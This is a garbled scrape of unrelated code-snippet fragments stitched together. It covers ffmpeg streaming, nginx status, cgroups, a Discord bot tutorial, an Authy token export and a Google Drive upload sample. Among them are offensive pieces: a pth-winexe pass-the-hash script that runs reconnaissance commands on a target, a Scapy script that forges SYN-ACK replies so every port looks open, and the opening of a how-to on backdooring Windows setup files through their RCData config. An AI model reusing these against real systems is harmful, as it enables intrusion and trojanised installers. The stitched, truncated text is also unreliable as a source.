#!/usr/local/bin/python2
from scapy.all import *
os.system("iptables -A OUTPUT -p tcp -o eth0 --sport 1:65535 --tcp-flags RST RST -j DROP")
def packet(pkt):
if pkt[TCP].flags == 2:
print('SYN packet detected port : ' + str(pkt[TCP].sport) + ' from IP Src : ' + pkt[IP].src)
send(IP(dst=pkt[IP].src, src=pkt[IP].dst)/TCP(dport=pkt[TCP].sport, sport=pkt[TCP].dport,ack=pkt[TCP].seq + 1, flags='SA'))
$ uname -a | |
Linux labs 3.0.0-12-generic-pae #20-Ubuntu SMP Fri Oct 7 16:37:17 UTC 2011 i686 i686 i386 GNU/Linux | |
(vanilla kernels after .39 already have everything for cgroups, RH backported it to .35 IIRC) | |
# http://www.mjmwired.net/kernel/Documentation/cgroups/memory.txt | |
# apt-get install cgroup-bin | |
# reboot | |
login, etc.. |
#! /bin/bash | |
# | |
# Diffusion youtube avec ffmpeg | |
# Configurer youtube avec une résolution 720p. La vidéo n'est pas scalée. | |
VBR="2500k" # Bitrate de la vidéo en sortie | |
FPS="30" # FPS de la vidéo en sortie | |
QUAL="medium" # Preset de qualité FFMPEG | |
YOUTUBE_URL="rtmp://a.rtmp.youtube.com/live2" # URL de base RTMP youtube |
#!/bin/bash | |
TARGET=$1 | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share" | |
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view" |
# Make sure the ngx_http_stub_status_module is installed correctly. | |
location /status { | |
add_header Content-Type application/json; | |
return 200 '{\r | |
"connections_active": $connections_active,\r | |
"connections_reading": $connections_reading,\r | |
"connections_writing": $connections_writing,\r | |
"connections_waiting": $connections_waiting | |
}'; | |
} |
javascript:(function(w){ | |
var arr = ['contextmenu','copy','cut','paste','mousedown','mouseup','beforeunload','beforeprint']; | |
for(var i = 0, x; x = arr[i]; i++){ | |
if(w['on' + x])w['on' + x] = null; | |
w.addEventListener(x, function(e){e.stopPropagation()}, true); | |
}; | |
for(var j = 0, f; f = w.frames[j]; j++){try{arguments.callee(f)}catch(e){}}})(window); |
*update: TBC, but this new might affect how easy it is to use this technique past August 2024: Authy is shutting down its desktop app | The 2FA app Authy will only be available on Android and iOS starting in August
This gist, based in part on a gist by Brian Hartvigsen, allows you to export from Authy your TOTP tokens you have stored there.
Those can be "standard" 6-digits / 30 secs tokens, or Authy's own version, the 7-digits / 10 secs tokens.
Author: Scott Sutherland, 2017 | |
Descript: Summary of how to backdoor an existing setup file in Windows. | |
Note: Not sure if anyone covered this already? Seems kind of like a Casey Smith thing. | |
How to Backdoor Existing Setup Files by Modifying Config Files Stored in RCData | |
In this example, the lyncsdk.exe will be used. It can be download here: https://www.microsoft.com/en-us/download/details.aspx?id=36824 | |
lyncentry.exe also works as an example. | |
Below are some basic instructions. |
Note: I'm busy as of writing this and this tutorial is not complete. Whatever state this file is in, please remember to add a .gitignore and hide config.json
in it. config.json
will contain your API keys for Discord! If this is comprimised, others may have access to your bot and how it responds with commands.
To register your soon-to-be bot with Discord, go to their developer portal and create a new app. Give it a name at the very least. Click 'Create App.' On the next screen, click 'Create a Bot User.' Note the values Client ID
, Client Secret
, and Token
.
I recommend creating a bot testing server in Discord to test out your bot without disturbing others. Plus, you'll be guarenteed the permissions needed to add a bot to your server. Add your client ID to the URL https://discordapp.com/oauth2/authorize?client_id=[CLIENT_ID]&permissions=0&scope=bot
where specified and go to
This is a sample script for uploading local file to Google Drive without the authorization using HTML form. A selected file in your local PC using HTML form is uploaded to Google Drive and saved to Google Drive.
When you use this, at first, please deploy Web Apps. The script is doPost()
of following scripts.
function doPost(e) {
var data = Utilities.base64Decode(e.parameters.data);